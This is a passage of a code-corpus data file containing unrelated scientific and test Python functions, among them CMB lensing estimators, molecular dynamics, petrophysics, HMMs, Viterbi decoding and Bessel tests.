neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def intf_MIDN(E):\n inputok= False\n if E.The.StackSize() >= 3: # Ensure something is here.\n checkob= E.The.StackCopyItemLast() \n if checkob.whatami == \"VAL\":\n inputok= True\n if not inputok or not inc.point_formatted_LST(E.The,2) or not inc.point_formatted_LST(E.The,3):\n print(\"Input Error: midn\")\n print(intf_MIDN.__doc__)\n return # Without doing much of anything.\n ratio= E.The.StackPop().val\n P1object= E.The.StackPop()\n #P1= map(lambda x:x.val, P1object.val) # Should now be a list of floats.\n P1= [x.val for x in P1object.val] # Should now be a list of floats.\n P0object= 
E.The.StackPop()\n #P0= map(lambda x:x.val, P0object.val) # Should now be a list of floats.\n P0= [x.val for x in P0object.val] # Should now be a list of floats.\n x= (P1[0]-P0[0]) * ratio + P0[0]\n y= (P1[1]-P0[1]) * ratio + P0[1]\n z= (P1[2]-P0[2]) * ratio + P0[2]\n z= objectifier.StackOB_VAL(z) # Can't be just regular Python ints.\n y= objectifier.StackOB_VAL(y)\n x= objectifier.StackOB_VAL(x)\n p= objectifier.StackOB_LST([x, y, z])\n p.names= ['x','y','z']\n E.The.StackPush(p)", "def createCNDTransEmiProb(self, qtc_type='qtcc'):\n \n if qtc_type == 'qtcb':\n state_num = 11\n elif qtc_type == 'qtcc':\n state_num = 83\n elif qtc_type == 'qtcbc':\n state_num = 92\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = []\n \n if qtc_type == 'qtcb':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2])\n elif qtc_type == 'qtcc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n elif qtc_type == 'qtcbc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2, np.NaN, np.NaN])\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = np.array(qtc)\n #np.savetxt('/home/cdondrup/qtc.csv', qtc, delimiter=',', fmt='%1f')\n \n trans = np.zeros((state_num, state_num))\n for i1 in xrange(qtc.shape[0]):\n for i2 in xrange(i1+1, qtc.shape[0]):\n trans[i1+1, i2+1] = np.nanmax(np.absolute(qtc[i1]-qtc[i2])) != 2\n if trans[i1+1, i2+1] == 1:\n for j1 in xrange(qtc.shape[1]-1):\n for j2 in xrange(j1+1, qtc.shape[1]):\n if sum(np.absolute(qtc[i1, [j1, j2]])) == 1 \\\n and sum(np.absolute(qtc[i2, [j1, j2]])) == 1:\n if np.nanmax(np.absolute(qtc[i1, [j1, j2]]-qtc[i2, [j1, j2]])) > 0 \\\n and sum(qtc[i1, [j1, j2]]-qtc[i2, [j1,j2]]) != 1:\n trans[i1+1, i2+1] = 5\n break\n if trans[i1+1, i2+1] != 1:\n break\n trans[i2+1, i1+1] = trans[i1+1, i2+1]\n \n trans[trans != 1] = 0\n #np.savetxt('/home/cdondrup/trans.csv', np.rint(trans).astype(int), delimiter=',', fmt='%i')\n trans[trans == 0] = 0.00001\n trans[0] = 1\n trans[:, 0] = 0\n trans[:, -1] = 1\n trans[0, -1] = 0\n trans[-1] = 0\n trans += np.dot(np.eye(state_num), 0.00001)\n trans[0, 0] = 0\n \n trans = trans / trans.sum(axis=1).reshape(-1, 1)\n #np.savetxt('/home/cdondrup/trans.csv', trans, delimiter=',')\n \n emi = np.eye(state_num)\n emi[emi == 0] = 0.0001\n \n return trans, emi", "def solveverlet(self,T,dt):\r\n t = 0.\r\n self.dt = dt\r\n self.n = int(T/dt)\r\n L = self.param[2]\r\n N = self.particles.size\r\n\r\n self.U = np.zeros([self.n])\r\n\r\n progress = t/T*100\r\n\r\n #JV: Here we define the number of the GxG grid that we will need to calcule the entropy, change in order to change the precision of this grid\r\n self.G = 7\r\n\r\n #JV: We create a list that will be useful for the walls submenu, that will help us in the border conditions of the wall, see in vel_verlet()\r\n self.bouncing = np.zeros(self.particles.size)\r\n\r\n if(self.param[4] == \"Subsystems\"): #JV: If we are on \"Subsystems\", we will count different the types of particles\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2]) #JV: When we are not in \"Subsystems\", we will have the same type of variable, but will only use the [:,:,0] (this is because numba has problems 
otherwise)\r\n\r\n self.entropy_val = 0\r\n\r\n #JV: If we are simulating the brownian simulation, we initialize the array that will keep track if the brownian particle goes through a wall\r\n if(self.param[4] == \"Brownian\"):\r\n self.wallcount = np.zeros([2])\r\n else:\r\n self.wallcount = np.zeros([2]) #JV: We have to keep both in the same type of variables, otherwise numba will have problems. So now this conditional block is quite poinless. TO-ERASE\r\n\r\n np.vectorize(lambda i: i.reset())(self.particles) #This line resets the particles to their initial position\r\n\r\n self.vel_verlet_on = True #JV: If it's true, it will compute with the velocity verlet algorithm, if it's not, it will compute with normal verlet\r\n\r\n self.Nlist = int(1*(self.particles.size)**(1/2)) #JV:This variable defines the number of close particles that will be stored in the list (go to close_particles_list() for more info)\r\n #print(self.Nlist)\r\n\r\n #X,Y,VX,VY has the trajectories of the particles with two indexes that\r\n #access time and particles, respectively\r\n self.X = np.vectorize(lambda i: i.r[0])(self.particles)\r\n self.Y = np.vectorize(lambda i: i.r[1])(self.particles)\r\n self.VX = np.vectorize(lambda i: i.v[0])(self.particles)\r\n self.VY = np.vectorize(lambda i: i.v[1])(self.particles)\r\n\r\n MX, MXT = np.meshgrid(self.X[:],self.X[:])\r\n MY, MYT = np.meshgrid(self.Y[:],self.Y[:])\r\n\r\n #JV: So dx is a nxn simetric array with 0 in the diagonal, and each position is the corresponding distance between the particles,\r\n # so the position [1,2] is the distance between partcle 1 and 2 (x1-x2), and so on\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: we first calculate the matrix that contains in every row the indexs of the m closest particles\r\n\r\n if(self.vel_verlet_on == True):\r\n #JV: We define the variables that we will need in the velocity verlet algorithm\r\n print(\"Computing with the Velocity-Verlet algorithm\")\r\n X0 = self.X\r\n Y0 = self.Y\r\n VX0 = self.VX\r\n VY0 = self.VY\r\n\r\n X1 = self.X\r\n Y1 = self.Y\r\n VX1 = self.VX\r\n VY1 = self.VY\r\n\r\n MX, MXT = np.meshgrid(X0[:],X0[:],copy=False)\r\n MY, MYT = np.meshgrid(Y0[:],Y0[:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n a0 = (1/self.m)*np.transpose(fv(X0[:],Y0[:],dx,dy,r2,t/self.dt,False,self.param[2],self.particles.size,self.U,self.dt,self.close_list,self.Nlist,self.vel_verlet_on,self.R,self.param[3],self.param[4],self.param[5],self.grid,self.G,self.wallcount,self.X2))\r\n\r\n for i in range(0, self.n):\r\n r1 = np.array([X0,Y0]) + np.array([VX0,VY0])*dt + 0.5*a0*dt**2\r\n\r\n MX, MXT = np.meshgrid(r1[0,:],r1[0,:],copy=False)\r\n MY, MYT = np.meshgrid(r1[1,:],r1[1,:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(self.param[3] == \"Free!\"):\r\n #JV: We do this to get the actual distance in the case of the \"Free!\" simulation, in which there is no elastic collision between the particles and the boundaries\r\n dx_v2 = 
(np.abs(dx.copy())-1*L)\r\n r2_v2 = dx_v2**2+dy**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n dy_v2 = (np.abs(dy.copy())-1*L)\r\n r2_v2 = dx**2+dy_v2**2\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n r2_v2 = dx_v2**2+dy_v2**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n\r\n #JV: call velocityverlet to compute the next position\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n X1,Y1,VX1,VY1,a1 = vel_verlet(t,dt,np.array([X0,Y0]),np.array([VX0,VY0]),a0,dx,dy,r2,self.close_list,self.m,self.R,L,N,self.param[3],self.param[4],self.param[7],self.param[8],self.param[9],self.U,self.Nlist,self.vel_verlet_on,self.param[5],self.grid,self.G,self.wallcount,self.X2,self.bouncing)\r\n\r\n #JV: Now we check where this particle is in a RxR grid, that will help us to calcule the entropy. We do not do this for the Brownian mode because we don't compute the entropy in that case.\r\n if(self.param[4] != \"Brownian\"):\r\n for h in range(0, N):\r\n if(self.param[4] == \"Subsystems\"):\r\n if(h < self.param[5]**2): #JV: self.param[5] stores the number of n1xn1 type 1 particles\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),0] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),1] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G))] += 1\r\n\r\n if(self.param[4] == \"Brownian\"):\r\n if(self.wallcount[0] == 0):\r\n self.X2 = np.append(self.X2,(abs(X1[N-1]))**2)\r\n else:\r\n self.X2 = np.append(self.X2,(L*self.wallcount[0]+(X1[N-1]))**2)\r\n self.entropy = np.append(self.entropy,self.entropy_val)\r\n\r\n t += dt\r\n\r\n self.X = np.vstack((self.X,X1))\r\n self.Y = np.vstack((self.Y,Y1))\r\n self.VX = np.vstack((self.VX, VX1))\r\n self.VY = np.vstack((self.VY, VY1))\r\n a0 = a1\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n VX0,VY0 = VX1,VY1\r\n\r\n #JV: Every amount of steps of time we calculate the entropy\r\n update_entropy = 2\r\n if(i % update_entropy == 0):\r\n\r\n self.entropy_val = 0\r\n sumagrid = np.sum(self.grid)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n sumagrid_subs = np.zeros([2])\r\n sumagrid_subs[0] = np.sum(self.grid[:,:,0]) #JV: Number of type-0 particles\r\n sumagrid_subs[1] = sumagrid - sumagrid_subs[0] #JV: Number of type-1 particles\r\n\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n for l in range(2):\r\n if ((self.grid[j,k,0]+self.grid[j,k,1]) != 0):\r\n # pji = float(self.grid[j,k,l])/(update_entropy*(self.grid[j,k,0]+self.grid[j,k,1]))\r\n pji = float((self.grid[j,k,l]/(sumagrid_subs[l]/(sumagrid_subs[0]+sumagrid_subs[1])))/(update_entropy*(self.grid[j,k,0]/(sumagrid_subs[0]/(sumagrid_subs[0]+sumagrid_subs[1])))+(self.grid[j,k,1]/(sumagrid_subs[1]/(sumagrid_subs[0]+sumagrid_subs[1])))))\r\n else:\r\n pji = 0\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji) #JV: We will only calculate the value when pji != 0\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n else:\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n pji = float(self.grid[j,k,0])/(update_entropy*sumagrid)\r\n if(pji != 0):\r\n 
self.entropy_val += -pji*np.log(pji)\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2])\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n else:\r\n print(\"Computing with the Verlet algorithm\")\r\n\r\n #Generation of the precious position (backwards euler step)\r\n X1 = self.X\r\n Y1 = self.Y\r\n X0 = X1 - self.VX*dt\r\n Y0 = Y1 - self.VY*dt\r\n\r\n for self.i in range(0,self.n):\r\n #Call verlet to compute the next position\r\n X2,Y2 = self.verlet(t,dt,np.array([X0,Y0]),np.array([X1,Y1]))\r\n t = t + dt\r\n\r\n #Add the new positions to X,Y,VX,VY\r\n self.X = np.vstack((self.X,X2))\r\n self.Y = np.vstack((self.Y,Y2))\r\n self.VX = np.vstack((self.VX,(X2-X0)/(2*dt)))\r\n self.VY = np.vstack((self.VY,(Y2-Y0)/(2*dt)))\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n X1,Y1 = X2,Y2\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(self.i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n #Once the computation has ended, I compute the kinetic energy,\r\n #the magnitude of the velocity V and the temperature\r\n #(see doc for temperature definition)\r\n self.KE()\r\n self.V = np.sqrt((self.VX**2 + self.VY**2))\r\n self.T = (np.sum(self.V**2,axis=1)/(self.particles.size*2 - 2))\r\n\r\n #Generation of the MB functions, you can modify the definition by\r\n #changing the linspace points\r\n vs,a = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n a,ts = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n self.MB = (vs/(ts)*np.exp(-vs**2/(2*ts)))\r\n\r\n #JV: If we are on the Subsystems submenu, we will calculate the temperature and the MB distribution of both types of particles\r\n if(self.param[4] == \"Subsystems\"):\r\n\r\n #JV: 1st group of particles\r\n self.V1 = np.sqrt((self.VX[:,0:(self.param[5]**2)]**2 + self.VY[:,0:(self.param[5]**2)]**2))\r\n self.T1 = (np.sum(self.V1**2,axis=1)/((self.param[5]**2)*2 - 2))\r\n\r\n vs1,a1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n a1,ts1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n self.MB1 = (vs1/(ts1)*np.exp(-vs1**2/(2*ts1)))\r\n\r\n #JV: 2nd group\r\n self.V2 = np.sqrt((self.VX[:,(self.param[5]**2):self.particles.size]**2 + self.VY[:,(self.param[5]**2):self.particles.size]**2))\r\n self.T2 = (np.sum(self.V2**2,axis=1)/((self.particles.size-self.param[5]**2)*2 - 2))\r\n\r\n vs2,a2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n a2,ts2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n self.MB2 = (vs2/(ts2)*np.exp(-vs2**2/(2*ts2)))\r\n\r\n \"\"\"Here I generate the accumulated V,T and MB using lists, the reason I use lists is because if you append two numpy arrays\r\n to an empty numpy array, they merge instead of remaining separate. 
You could technically use splicing to save on memory\r\n but sacrificing cpu.\"\"\"\r\n\r\n self.Vacu = []\r\n self.Tacu = []\r\n self.MBacu = []\r\n self.Vacu.append(self.V[int(self.n/2),:])\r\n self.Tacu.append(np.sum(self.V[int(self.n/2),:]**2)/(self.particles.size*2 - 2))\r\n\r\n vs = np.linspace(0,self.V.max(),100)\r\n self.MBacu.append((vs/(self.Tacu[0])*np.exp(-vs**2/(2*self.Tacu[0]))))\r\n\r\n #This delta controls the time interval for accumulation, right now its every 5 units\r\n delta = 5./dt\r\n\r\n #This 40 that appers in these lines is the time from which I start accumulating\r\n #to ensure the system has reached equilibrium.\r\n for i in range(1,int((self.n-(40./dt))/delta)):\r\n self.Vacu.append(np.hstack((self.Vacu[i-1],self.V[int(40./dt)+int(i*delta),:])))\r\n self.Tacu.append(np.sum(self.Vacu[i]**2)/(self.Vacu[i].size*2 - 2))\r\n self.MBacu.append((vs/(self.Tacu[i])*np.exp(-vs**2/(2*self.Tacu[i]))))\r\n return", "def ORM2(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dk,Dpf],[HIc1,HIk,HIpf],[1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=0.000 # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[1] # Volume of organic component\n\t\tPHIe=XMatrix[2] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water 
Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def test_inu(self):\n lmax = 3\n x = np.array([5000])\n result_i, result_k = bessel_sk.lniknu(x, lmax)\n pih = np.log(0.5*np.pi)\n expP = (1+np.exp(-2*x))\n expM = (1-np.exp(-2*x))\n expected_i = np.array([\n -np.log(2*x**1) + x + np.log(expM),\n -np.log(2*x**2) + x + np.log(expM*(x+1)+x-1),\n -np.log(2*x**3) + x + np.log((3+x**2)*expM-3*x*expP),\n -np.log(2*x**4) + x + np.log((15*x+x**3)*expP-(15+6*x**2)*expM) \n ])\n expected_k = np.array([pih -x - 1*np.log(x),\n pih -x - 2*np.log(x) + np.log(x+1),\n pih -x - 3*np.log(x) + np.log(x**2+3*x+3),\n pih -x - 4*np.log(x) + np.log(x**3+6*x**2+15*x+15)\n ])\n assert_almost_equal(result_i[0]/expected_i.T, 1, decimal=4)\n assert_almost_equal(result_k[0]/expected_k.T, 1, decimal=4)", "def exercise_b2_113():\r\n pass", "def N_TT_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTB(l2)\n result += 0. 
#self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TB.__func__, \"integ\"):\n self.N_TT_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def _inv_totient_estimate(m):\n primes = [ d + 1 for d in divisors(m) if isprime(d + 1) ]\n\n a, b = 1, 1\n\n for p in primes:\n a *= p\n b *= p - 1\n\n L = m\n U = int(math.ceil(m*(float(a)/b)))\n\n P = p = 2\n primes = []\n\n while P <= U:\n p = nextprime(p)\n primes.append(p)\n P *= p\n\n P //= p\n b = 1\n\n for p in primes[:-1]:\n b *= p - 1\n\n U = int(math.ceil(m*(float(P)/b)))\n\n return L, U", "def test_LM(self):\n\t\t\n\t\tprecision = 10**-8\n\t\t\t\t \n\t\tif self.n == 1:\n\t\t\t\t \n\t\t\tP_sum = sum(self.estimate_prob('', w) for w in self.vocab)\n\t\t\t\n\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one.'\n\t\t\t\t \n\t\telif self.n == 2:\n\t\t\thistories = ['the', 'in', 'at', 'blue', 'white']\n\t\t\t\t \n\t\t\tfor h in histories:\n\t\t\t\t \n\t\t\t\tP_sum = sum(self.estimate_prob(h, w) for w in self.vocab)\n\t\t\t\t\n\t\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one for history' + h\n\t\t\t\t\t \n\t\tprint('TEST SUCCESSFUL!')", "def test_uneven_sw():\n B = 100\n t = 1\n H = 30\n E = 20000\n sections = ((2 * B, t, 0, E), (B, t, H - t, E))\n EI, top, bot = bm.EI(sections, E)\n assert 1.95 < abs(bot) / top < 1.96", "def test_active_inference_SPM_1a(self):\n array_path = os.path.join(os.getcwd(), DATA_PATH + \"vbx_test_1a.mat\")\n mat_contents = loadmat(file_name=array_path)\n\n A = mat_contents[\"A\"][0]\n B = mat_contents[\"B\"][0]\n C = to_arr_of_arr(mat_contents[\"C\"][0][0][:,0])\n obs_matlab = mat_contents[\"obs\"].astype(\"int64\")\n policy = mat_contents[\"policies\"].astype(\"int64\") - 1\n t_horizon = mat_contents[\"t_horizon\"][0, 0].astype(\"int64\")\n actions_matlab = mat_contents[\"actions\"].astype(\"int64\") - 1\n qs_matlab = mat_contents[\"qs\"][0]\n xn_matlab = mat_contents[\"xn\"][0]\n vn_matlab = mat_contents[\"vn\"][0]\n\n likelihoods_matlab = mat_contents[\"likelihoods\"][0]\n\n num_obs, num_states, _, num_factors = get_model_dimensions(A, B)\n obs = convert_observation_array(obs_matlab, num_obs)\n T = len(obs)\n\n agent = Agent(A=A, B=B, C=C, inference_algo=\"MMP\", policy_len=1, \n inference_horizon=t_horizon, use_BMA = False, \n policy_sep_prior = True)\n \n actions_python = np.zeros(T)\n\n for t in range(T):\n o_t = (np.where(obs[t])[0][0],)\n qx, xn_t, vn_t = agent.infer_states_test(o_t)\n q_pi, efe= agent.infer_policies()\n action = agent.sample_action()\n\n actions_python[t] = action\n\n xn_python = build_xn_vn_array(xn_t)\n vn_python = build_xn_vn_array(vn_t)\n\n if t == T-1:\n xn_python = xn_python[:,:,:-1,:]\n vn_python = vn_python[:,:,:-1,:]\n\n start_tstep = max(0, agent.curr_timestep - agent.inference_horizon)\n end_tstep = min(agent.curr_timestep + agent.policy_len, T)\n\n xn_validation = xn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n vn_validation = vn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n\n self.assertTrue(np.isclose(xn_python, xn_validation).all())\n self.assertTrue(np.isclose(vn_python, vn_validation).all())\n \n 
self.assertTrue(np.isclose(actions_matlab[0,:],actions_python[:-1]).all())", "def test_act_iv(self):\n # setup\n self.transaction_behaviour.processing = None\n self.transaction_behaviour.waiting = []\n\n # operation\n self.transaction_behaviour.act()\n\n # after\n self.assert_quantity_in_outbox(0)", "def viterbi(self):\n # initialisation\n self.phi = zeros((self.noOfEmmittingStates+2, self.T + 1))\n self.phi[0,0] = 1.0\n for i in range(1,self.noOfEmmittingStates+2):\n self.phi[i,0] = 0.0\n for t in range(1,self.T+1):\n self.phi[0,t] = 0.0\n self.traceback = zeros((self.noOfEmmittingStates+1, self.T+1))\n\n # main recursion\n for t in range(1, self.T + 1):\n for j in range(1, self.noOfEmmittingStates + 1):\n phiTemp = zeros((self.noOfEmmittingStates + 1, 1))\n for k in range(self.noOfEmmittingStates+1):\n phiTemp[k,0] = self.phi[k,t-1] * self.transitionMatrix[k, j-1]\n self.traceback[j-1,t-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[j, t] = phiTemp.max(0) * self.b[j-1, t-1]\n\n # last column - set states which can't reach term to 0, sub for term\n for j in range(1,self.noOfEmmittingStates + 1):\n if self.transitionMatrix[j,-1] == 0:\n self.phi[j,-1] = 0\n phiTemp = zeros((self.noOfEmmittingStates+1, 1))\n for k in range(self.noOfEmmittingStates + 1):\n phiTemp[k,0] = self.phi[k,-1] * self.transitionMatrix[k,-1]\n self.traceback[-1,-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[-1,-1] = 